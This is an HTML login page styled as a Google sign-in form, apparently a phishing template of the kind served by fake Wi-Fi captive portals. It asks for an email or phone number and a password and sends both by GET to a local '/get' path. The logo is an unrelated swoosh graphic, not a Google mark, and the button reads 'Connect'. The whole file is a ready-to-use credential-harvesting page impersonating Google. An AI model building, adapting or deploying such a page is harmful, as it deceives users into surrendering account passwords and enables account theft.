<!DOCTYPE html>
<html>
<head>
<style>
body {
  font-family: Arial, sans-serif;
  background-color: #FFFFFF;
}

.container {
  max-width: 400px;
  margin: 0 auto;
  padding: 20px;
}

@media (min-width: 600px) {
  .container {
    max-width: 500px;
  }
}

.logo-container {
  text-align: center;
  margin-bottom: 30px;
  display: flex;
  justify-content: center;
  align-items: center;
}

.logo {
  width: 40px;
  height: 40px;
  fill: #000000;
  margin-right: 100px
}

.form-container {
  background: #FFFFFF;
  border: 1px solid #FFFFFF;
  border-radius: 4px;
  padding: 20px;
  box-shadow: 0px 0px 10px 0px rgba(108,66,156,0.2);
}

h1 {
  text-align: center; 
  font-size: 28px;
  font-weight: 500;
  color: #000000;
  margin-bottom: 20px;
}

h2 {
  text-align: center; 
  font-size: 28px;
  font-weight: 500;
  color: #000000;
  margin-bottom: 20px;
}

.input-field {
  width: 100%;
  padding: 12px;
  border: 1px solid #000000;
  border-radius: 4px;
  box-sizing: border-box;
  margin-bottom: 20px;
  font-size: 14px;
}

.submit-btn {
  background: #000000;
  border: none;
  color: #FFFFFF;
  padding: 12px 20px;
  border-radius: 4px;
  cursor: pointer;
  font-size: 16px;
  display: block;
  margin: auto;
  margin-top: 20px;
}

.submit-btn:hover {
  background: #000000;
}


</style>
</head>

<body>

<div class="container">

  <div class="logo-container">
<svg version="1.0" xmlns="http://www.w3.org/2000/svg"
 width="368.000000pt" height="137.000000pt" viewBox="0 0 368.000000 137.000000"
 preserveAspectRatio="xMidYMid meet">
<g transform="translate(0.000000,137.000000) scale(0.100000,-0.100000)"
fill="#000000" stroke="none">
<path d="M553 1139 c-101 -116 -183 -223 -231 -303 -88 -144 -139 -319 -126
-430 13 -122 99 -231 214 -272 115 -41 305 -26 499 39 83 28 2543 1059 2538
1063 -1 1 -528 -137 -1172 -307 -643 -170 -1202 -316 -1242 -324 -94 -20 -235
-19 -302 1 -69 20 -141 86 -171 156 -19 45 -22 65 -18 147 5 101 19 153 72
264 18 37 31 67 30 67 -2 0 -42 -45 -91 -101z"/>
</g>
</svg>




  </div>

  <div class="form-container">

    <center><h1>Sign in with your Google account</h1>
      </center>

    <form action="/get" id="login-form">
    
      <input name="email" class="input-field" type="text" placeholder="Email or mobile phone number" required>
      
      <input name="password" class="input-field" type="password" placeholder="Password" required>
	  
      <button class="submit-btn" type="submit">Connect</button>


    </form>

  </div>

</div>
</body>
</html>
